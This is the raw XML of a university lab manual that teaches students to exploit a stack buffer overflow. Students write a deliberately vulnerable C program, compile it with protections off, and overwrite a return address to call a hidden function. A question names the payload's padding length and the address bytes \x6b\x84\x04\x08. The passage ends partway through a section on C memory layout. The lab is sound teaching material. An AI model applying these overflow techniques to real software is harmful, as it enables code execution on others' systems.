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5E00" w:rsidRDefault="00D1675A" w:rsidP="00615E00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Buffer Overflow</w:t>
      </w:r>
      <w:r w:rsidR="004747E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attac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rank Xu, Bowie State University.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00881E29" w:rsidRDefault="009801A3" w:rsidP="00881E29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The lab manual is developed </w:t>
            </w:r>
            <w:r w:rsidR="00881E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based on the post </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00881E29" w:rsidRPr="00881E29" w:rsidRDefault="00881E29" w:rsidP="00881E29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 w:rsidRPr="00881E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https://dhavalkapil.com/blogs/Buffer-Overflow-Exploit/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.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009801A3" w:rsidRDefault="009801A3" w:rsidP="009801A3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mments and suggestions can be sent to wxu@bowiestate.edu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009801A3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:rsidR="00AE097A" w:rsidRPr="00AE097A" w:rsidRDefault="00AE097A" w:rsidP="00AE097A">
      <w:p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/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE097A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Objective</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE097A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</w:p>
    <w:p w:rsidR="00AE097A" w:rsidRPr="00CE4AB7" w:rsidRDefault="00AE097A" w:rsidP="00AE097A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/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  <w:r w:rsidRPr="00AE097A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>The learning objective of this lab is for students to gain the first-hand exper</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4AB7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ience on buffer-overflow vulner</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE097A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ability by putting what they have learned about the vulnerability from class into action. Buffer overflow is</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4AB7"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</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE097A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>defined as the condition in which a program attempts to write data beyond the boundaries of pre-allocated</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4AB7"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</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE097A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>fixed length buffers. This vulnerability can be utilized by a malicious user to alter the flow control of the</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4AB7"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</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE097A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>program, even execute arbitrary pieces of code. This vulnerability arises due to the mixing of the storage</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4AB7"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</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE097A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>for data (e.g. buffers) and the storage for controls (e.g. return addresses): an overflow in the data part can</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4AB7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE097A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>affect the control flow of the program, because an overflow can change the return address.</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00AE097A" w:rsidRPr="00AE097A" w:rsidRDefault="00AE097A" w:rsidP="00AE097A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:eastAsiaTheme="minorEastAsia" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00780013" w:rsidRDefault="00615E00" w:rsidP="00780013">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0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/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E5842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Lab Environment</w:t>
      </w:r>
      <w:r w:rsidR="00A809CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> setting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D82EAA" w:rsidRPr="00780013" w:rsidRDefault="00AC090D" w:rsidP="00780013">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1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/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00780013">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Install Kali Linux. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06D74" w:rsidRDefault="00D82EAA" w:rsidP="00A06D74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atch the installation tutorial </w:t>
      </w:r>
      <w:r w:rsidR="00A06D74">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">from the share drive. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC090D" w:rsidRPr="00AC090D" w:rsidRDefault="00A06D74" w:rsidP="00A06D74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Download and install </w:t>
      </w:r>
      <w:r w:rsidRPr="00A06D74">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>https://www.offensive-security.com/kali-linux-vmware-virtualbox-image-download/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00667B0B" w:rsidRPr="00AC090D" w:rsidRDefault="00667B0B" w:rsidP="00BD2BF6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 w:rsidRPr="00AC090D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">root </w:t>
      </w:r>
      <w:r w:rsidR="00AC090D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">account </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC090D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">as: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00667B0B" w:rsidRPr="00BB5835" w:rsidRDefault="00667B0B" w:rsidP="00BB5835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BB5835">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Username: root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006542B7" w:rsidRDefault="00667B0B" w:rsidP="003E793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BB5835">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Password: </w:t>
      </w:r>
      <w:r w:rsidR="00011777">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>toor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E7934" w:rsidRDefault="003E7934" w:rsidP="003E7934">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0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/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E7934">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Create a c Program with Buffer Overflow Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E7934" w:rsidRDefault="003E7934" w:rsidP="003E7934">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1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mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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000000"/>
        </w:rPr>
        <w:t>bof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="003E7934">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> You may want to create a fold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er using </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00076903" w:rsidRPr="003E7934" w:rsidRDefault="003E7934" w:rsidP="003E7934">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1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/>
        </w:rPr>
        <w:t>gedit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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000000"/>
        </w:rPr>
        <w:t>vunln.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00076903" w:rsidRDefault="003F4759" w:rsidP="003E7934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198E4463" wp14:editId="4DFF47D4">
            <wp:extent cx="3906912" cy="324413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14221" cy="3250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FA6" w:rsidRDefault="00885FA6" w:rsidP="00885FA6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1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The goal of the lab is to invoke the function </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>secretFunction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB09BB" w:rsidRPr="00EF712C" w:rsidRDefault="00AB09BB" w:rsidP="00AB09BB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0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/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF712C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Compile and Execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4833" w:rsidRPr="00AB09BB" w:rsidRDefault="00AB09BB" w:rsidP="00AB09BB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1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 w:rsidRPr="00AB09BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Compile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with protection model off</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4833" w:rsidRDefault="00D71B32" w:rsidP="00AB09BB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4979732A" wp14:editId="5343E607">
            <wp:extent cx="4929809" cy="205782"/>
            <wp:effectExtent l="0" t="0" r="444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0734" cy="20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9BB" w:rsidRDefault="00AB09BB" w:rsidP="00AB09BB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1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(Optional) Handle error message.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB09BB" w:rsidRDefault="00AB09BB" w:rsidP="00AB09BB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2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If you see the following message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB09BB" w:rsidRDefault="00AB09BB" w:rsidP="00AB09BB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</w:p>
    <w:p w:rsidR="00B571E7" w:rsidRDefault="00B571E7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2476E5A2" wp14:editId="00542B7B">
            <wp:extent cx="5943600" cy="10166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9BB" w:rsidRDefault="00AB09BB" w:rsidP="00AB09BB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2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Download additional library</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4833" w:rsidRDefault="00D71B32" w:rsidP="00AB09BB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4664102F" wp14:editId="07CDB298">
            <wp:extent cx="4295775" cy="2000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9BB" w:rsidRDefault="00AB09BB" w:rsidP="00AB09BB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2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Recompile it </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF712C" w:rsidRDefault="00AB09BB" w:rsidP="00EF712C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6C734F0C" wp14:editId="1EAC6C4F">
            <wp:extent cx="4929809" cy="205782"/>
            <wp:effectExtent l="0" t="0" r="444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0734" cy="20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12C" w:rsidRDefault="00EF712C" w:rsidP="00EF712C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0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E</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF712C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>xploit the binary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF712C" w:rsidRPr="00EF712C" w:rsidRDefault="00EF712C" w:rsidP="00EF712C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1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 w:rsidRPr="00EF712C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Type the command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4833" w:rsidRDefault="00AB09BB" w:rsidP="00EF712C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59181B6D" wp14:editId="7C57A366">
            <wp:extent cx="2895600" cy="2571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4833" w:rsidRDefault="00EF712C" w:rsidP="00EF712C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1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Running results</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4833" w:rsidRDefault="005C4833" w:rsidP="00EF712C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517DFAD0" wp14:editId="3ABC7336">
            <wp:extent cx="4456180" cy="4126727"/>
            <wp:effectExtent l="0" t="0" r="190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82068" cy="4150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903" w:rsidRDefault="00076903">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A237A6" w:rsidRPr="00D1460D" w:rsidRDefault="00D8159B" w:rsidP="00D8159B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0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 w:rsidRPr="00D8159B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D1460D" w:rsidRPr="00D8159B" w:rsidRDefault="00D1460D" w:rsidP="00D1460D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1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 w:rsidRPr="00D1460D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Type the following command. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D1460D" w:rsidRDefault="00A237A6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0D977024" wp14:editId="3B9A9B3E">
            <wp:extent cx="5943600" cy="10242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4054" w:rsidRDefault="00D1460D" w:rsidP="00D1460D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1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 w:rsidRPr="00D1460D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Questions</w:t>
      </w:r>
      <w:r w:rsidR="00EA4054">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA4054" w:rsidRDefault="00D1460D" w:rsidP="00EA4054">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2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Describe your observation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA4C30" w:rsidRDefault="00CA4C30" w:rsidP="00EA4054">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2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Where does the number 32 come from?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA4054" w:rsidRDefault="00EA4054" w:rsidP="00EA4054">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2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What </w:t>
      </w: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does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 the print “a”+32 mean?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA4054" w:rsidRDefault="00EA4054" w:rsidP="00EA4054">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2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What does \x6b\x84\x04\x08 mean?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21540" w:rsidRDefault="00B21540" w:rsidP="00D1460D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="120" w:line="324" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="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lastRenderedPageBreak/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="004076B9" w:rsidRPr="00F54C51" w:rsidRDefault="003D630F" w:rsidP="004076B9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F54C51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Buffer Overflow</w:t>
      </w:r>
      <w:r w:rsidR="004076B9" w:rsidRPr="00F54C51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>: How It Works</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E5E02" w:rsidRPr="00F54C51" w:rsidRDefault="00C12915">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F54C51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Memory Layout of a C program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004076B9" w:rsidRDefault="00957BC3" w:rsidP="00957BC3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 w:rsidRPr="00957BC3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2640728" cy="2246358"/>
            <wp:effectExtent l="0" t="0" r="7620" b="1905"/>
            <wp:docPr id="3" name="Picture 3" descr="http://i.stack.imgur.com/1Yz9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.stack.imgur.com/1Yz9K.gif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5476" cy="2250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57BC3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>http://i.stack.imgur.com/1Yz9K.gif</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00957BC3" w:rsidRPr="00957BC3" w:rsidRDefault="00957BC3" w:rsidP="00957BC3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324"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00957BC3">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Command line arguments and environment variables</w:t>
      </w:r>
      <w:r w:rsidRPr="00957BC3">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The arguments passed to a program before running and the environment variables are stored in this section.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00957BC3" w:rsidRPr="00957BC3" w:rsidRDefault="00957BC3" w:rsidP="00957BC3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324"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00957BC3">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Stack</w:t>
      </w:r>
      <w:r w:rsidRPr="00957BC3">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is the place where all the function parameters, return addresses and the local variables of the function are stored. It’s a</w:t>
      </w:r>
      <w:r w:rsidRPr="00957BC3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00957BC3">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="1" w:color="D5D5E9" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEFF"/>
        </w:rPr>
        <w:t>LIFO</w:t>
      </w:r>
      <w:r w:rsidRPr="00957BC3">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>structure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00957BC3">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It grows downward in </w:t>
      </w:r>
      <w:r w:rsidR="003712DA" w:rsidRPr="00957BC3">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>memory (</w:t>
      </w:r>
      <w:r w:rsidRPr="00957BC3">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>from higher address space to lower address space) as new function calls are made. We will examine the stack in more detail later.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00957BC3" w:rsidRPr="00957BC3" w:rsidRDefault="00957BC3" w:rsidP="00957BC3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324"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00957BC3">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Heap</w:t>
      </w:r>
      <w:r w:rsidRPr="00957BC3">
        <w:rPr>
